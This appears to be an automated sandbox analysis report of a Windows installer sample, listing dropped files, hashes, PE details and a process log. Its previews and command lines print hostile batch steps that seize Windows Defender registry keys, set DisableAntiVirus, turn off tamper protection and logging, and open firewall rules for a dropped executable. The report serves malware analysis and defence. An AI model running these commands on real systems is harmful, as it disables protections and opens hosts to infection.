                                      Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrato
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):11803
                                      Entropy (8bit):5.183187239897201
                                      Encrypted:false
                                      SSDEEP:192:5BoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:EK
                                      MD5:B60D077ADF7BE05264F97AB9EB4A2A5E
                                      SHA1:6C96206552E0F447F0F91969EC74B1F1F69CDDB0
                                      SHA-256:F9BB94BE65B2E173E181AE6C2D0D2D9D045A4A98C774834417667B5A1671022E
                                      SHA-512:42C25078CD271E305803D640E1A6715DDF624615F68E1FE3F094F78B4D5DECD70E337282942ECF1544D398A82DF071C3E501AA81638AA5EFA40A24FB7B7B363E
                                      Malicious:false
                                      Preview: @echo off & title f & color 17.. cd %~dp0.. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f.. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f.. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f.. reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f.. reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGea
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7168
                                      Entropy (8bit):5.2959870663251625
                                      Encrypted:false
                                      SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                      MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                      SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                      SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                      SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):5632
                                      Entropy (8bit):3.707238240195832
                                      Encrypted:false
                                      SSDEEP:48:6eamkugEfu1u8DMMvWlfeaQivkZZtMlDIra569FHpfbNtm:ImzJfvlfe61+fzNt
                                      MD5:F5BF0584C7936615D2C909288CA2C718
                                      SHA1:5C746BBB8D1EAF775277A279E05079EDB5BC10B3
                                      SHA-256:84578789733938BBB2FAEDDDB5048FE85322E97ED1B748F3FCDF514C798F5B97
                                      SHA-512:2A79F321D5BDEB8F4F85B2F3C72131CECD3BFC1D3DC3294212E6BF12C09CAED390D07BBDE6086E574D02115E6B244C48A2AE40136348BA01FC17332BCC77EF9E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 5%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...U..e.........."...0..............(... ...@....@.. ....................................@.................................H(..O....@.......................`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................|(......H........ ..X...........................................................n...r...p...(....r...p(....*..(....*.0..%.......s........o.......,..o.....r...p(....*...................BSJB............v2.0.50727......l... ...#~..........#Strings....(...,...#US.T.......#GUID...d.......#Blob...........G..........3........................................................?.L.....L.........l..........."................._.....x.............-...~.-.....................d.....K.................
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):239
                                      Entropy (8bit):5.021036233822738
                                      Encrypted:false
                                      SSDEEP:6:TMVBd1IGMfVVa7VNQA1Q7VJdfEyFRfyrhAW4QIm:TMHdGGsVazcrfyW3xm
                                      MD5:F2ECA2D00A9C69AF3E08C55DA5EC8299
                                      SHA1:5001564F3BFE5CDC60BDA5A14D8AF59105AB97DD
                                      SHA-256:6FC2543E8CD92F5DB9CAA385B64E5ABAB27D64D4F335B0E0F3A8FE8E87B8F181
                                      SHA-512:711072383DFB333A6C4ACE51E04C3FAA6B5D712533EEE0B2685DDBD00A45C4213203B62490A435E6F4AABD2F64319A25E71D0C6269E677F3B20EF90E7A98BFFC
                                      Malicious:true
                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup>..</configuration>..
                                      Process:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.655569464152001
                                      Encrypted:false
                                      SSDEEP:96:/uidPNKO2mkcQ7DBOrkB0kPkKXwF4dkd8Nue3qYMns1BjgtRQWWzNt:FIOu7DBOrkB0kPkKXwF4dkd8Nn34nUBR
                                      MD5:7CB364701028767F8942CC3F8439F8F2
                                      SHA1:D6BEDE2206B7042B4CAE32F416E1B43FFAC94238
                                      SHA-256:A2716605F8DD1930808E6918DB670A3FE32287791862883DBABD26849B87B09E
                                      SHA-512:3011B3D64F79280AB05DE9658C4F5A13F637AD2E79D5770CFAEB3AF6CB8C7A56B610DAD69FDF295112BE64CFB80E18F30BB1829EB3C0E549105F63D0E770DC13
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dK............"...0.............:-... ...@....@.. ....................................`..................................,..O....@.......................`......P,..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P!...............................................................0..V.........(....,Lr...p......%..{..........%..{..........%..{..........%. ]X..(..........(....*..(....*...0..Z.........}......}......}.............. ....}......(....-&..{....}......{....}......{....}.....*.*...0............(....,..{..........*.*..(....*BSJB............v4.0.30319......l.......#~..L.......#Strings.... ...$...#US.D.......#GUID...T.......#Blob...........W=.........3................#.......
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.977075315758542
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:4hIPvzV6a2.exe
                                      File size:884'928 bytes
                                      MD5:99a7d3f6669bc38e1fe1ca11e9085516
                                      SHA1:a81034e3d7c91817f2864795f85e2c137f3afafb
                                      SHA256:0a982520cd694fa4eed2a58829908080c9b004df99f79af26a0e3a86fa7197f0
                                      SHA512:2462e7df4ec8be2d5ef1a00c242d042988f2b61757c3d0ebafb1a2eaef54c73f2011e55faa2e2e0f90083fd8a2f1df5326c3ae82cd70adffc278242a8c747787
                                      SSDEEP:24576:OfLvipk/jcAoC53Ms9paV1NUUqg+QNylBRmtpQ3VD5F/QXQp:MSPCqsnaVnHB4lmtpQ3l5Wy
                                      TLSH:4A153305E75ED2C7F6D992331A3A3FB45FF3A9305A204B9347DCDEA8B928460B19D124
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........
                                      Icon Hash:0771ccf8d84d2907
                                      Entrypoint:0x403532
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                      Instruction
                                      sub esp, 000003F8h
                                      push ebp
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebp, ebp
                                      push 00008001h
                                      mov dword ptr [esp+20h], ebp
                                      mov dword ptr [esp+18h], 0040A2D8h
                                      mov dword ptr [esp+14h], ebp
                                      call dword ptr [004080A4h]
                                      mov esi, dword ptr [004080A8h]
                                      lea eax, dword ptr [esp+34h]
                                      push eax
                                      mov dword ptr [esp+4Ch], ebp
                                      mov dword ptr [esp+0000014Ch], ebp
                                      mov dword ptr [esp+00000150h], ebp
                                      mov dword ptr [esp+38h], 0000011Ch
                                      call esi
                                      test eax, eax
                                      jne 00007FD298804F1Ah
                                      lea eax, dword ptr [esp+34h]
                                      mov dword ptr [esp+34h], 00000114h
                                      push eax
                                      call esi
                                      mov ax, word ptr [esp+48h]
                                      mov ecx, dword ptr [esp+62h]
                                      sub ax, 00000053h
                                      add ecx, FFFFFFD0h
                                      neg ax
                                      sbb eax, eax
                                      mov byte ptr [esp+0000014Eh], 00000004h
                                      not eax
                                      and eax, ecx
                                      mov word ptr [esp+00000148h], ax
                                      cmp dword ptr [esp+38h], 0Ah
                                      jnc 00007FD298804EE8h
                                      and word ptr [esp+42h], 0000h
                                      mov eax, dword ptr [esp+40h]
                                      movzx ecx, byte ptr [esp+3Ch]
                                      mov dword ptr [004347B8h], eax
                                      xor eax, eax
                                      mov ah, byte ptr [esp+38h]
                                      movzx eax, ax
                                      or eax, ecx
                                      xor ecx, ecx
                                      mov ch, byte ptr [esp+00000148h]
                                      movzx ecx, cx
                                      shl eax, 10h
                                      or eax, ecx
                                      movzx ecx, byte ptr [esp+0000004Eh]
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x3ec0.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x68d80x6a00742185983fa6320c910f81782213e56fFalse0.6695165094339622data6.478461709868021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x2a8180x6009a9bf385a30f1656fc362172b16d9268False0.5247395833333334data4.172601271908501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x350000x370000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x6c0000x3ec00x4000d3c7dc45feefd6fa17ded897c3993d11False0.63311767578125data5.995004495484429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x6c2b00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.7213883677298312
                                      RT_ICON0x6d3580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colorsEnglishUnited States0.6751066098081023
                                      RT_ICON0x6e2000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States0.7851985559566786
                                      RT_ICON0x6eaa80x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.6560693641618497
                                      RT_ICON0x6f0100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8031914893617021
                                      RT_ICON0x6f4780x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States0.3118279569892473
                                      RT_ICON0x6f7600x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishUnited States0.36824324324324326
                                      RT_DIALOG0x6f8880x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x6f9880x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x6faa80x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x6fb080x68dataEnglishUnited States0.6634615384615384
                                      RT_MANIFEST0x6fb700x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5517241379310345
                                      DLLImport
                                      ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                      SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                      ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                      COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                      USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                      GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                      KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      No network behavior found

                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:01:12:01
                                      Start date:22/09/2024
                                      Path:C:\Users\user\Desktop\4hIPvzV6a2.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\4hIPvzV6a2.exe"
                                      Imagebase:0x400000
                                      File size:884'928 bytes
                                      MD5 hash:99A7D3F6669BC38E1FE1CA11E9085516
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:01:12:01
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\netsh.exe
                                      Wow64 process (32bit):true
                                      Commandline:netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
                                      Imagebase:0x1560000
                                      File size:82'432 bytes
                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:01:12:01
                                      Start date:22/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:01:12:01
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\netsh.exe
                                      Wow64 process (32bit):true
                                      Commandline:netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private
                                      Imagebase:0x1560000
                                      File size:82'432 bytes
                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:01:12:01
                                      Start date:22/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:01:12:01
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:01:12:01
                                      Start date:22/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:01:12:02
                                      Start date:22/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
                                      Wow64 process (32bit):false
                                      Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
                                      Imagebase:0x7ff686820000
                                      File size:616'312 bytes
                                      MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 0%, ReversingLabs
                                      • Detection: 0%, Virustotal, Browse
                                      Reputation:low
                                      Has exited:true

                                      Target ID:8
                                      Start time:01:12:02
                                      Start date:22/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
                                      Wow64 process (32bit):false
                                      Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
                                      Imagebase:0x7ff686820000
                                      File size:616'312 bytes
                                      MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:9
                                      Start time:01:12:02
                                      Start date:22/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
                                      Wow64 process (32bit):false
                                      Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
                                      Imagebase:0x7ff686820000
                                      File size:616'312 bytes
                                      MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:10
                                      Start time:01:12:02
                                      Start date:22/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
                                      Wow64 process (32bit):false
                                      Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
                                      Imagebase:0x7ff686820000
                                      File size:616'312 bytes
                                      MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:11
                                      Start time:01:12:02
                                      Start date:22/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
                                      Wow64 process (32bit):false
                                      Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
                                      Imagebase:0x7ff686820000
                                      File size:616'312 bytes
                                      MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:12
                                      Start time:01:12:02
                                      Start date:22/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
                                      Wow64 process (32bit):false
                                      Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
                                      Imagebase:0x7ff686820000
                                      File size:616'312 bytes
                                      MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:13
                                      Start time:01:12:03
                                      Start date:22/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
                                      Wow64 process (32bit):false
                                      Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
                                      Imagebase:0x7ff686820000
                                      File size:616'312 bytes
                                      MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:14
                                      Start time:01:12:03
                                      Start date:22/09/2024
                                      Path:C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe
                                      Wow64 process (32bit):false
                                      Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
                                      Imagebase:0x7ff686820000
                                      File size:616'312 bytes
                                      MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:15
                                      Start time:01:12:03
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat
                                      Imagebase:0x240000
                                      File size:236'544 bytes
                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:01:12:03
                                      Start date:22/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:01:12:03
                                      Start date:22/09/2024
                                      Path:C:\Windows\SysWOW64\reg.exe
                                      Wow64 process (32bit):true
                                      Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
                                      Imagebase:0xd90000
                                      File size:59'392 bytes
                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
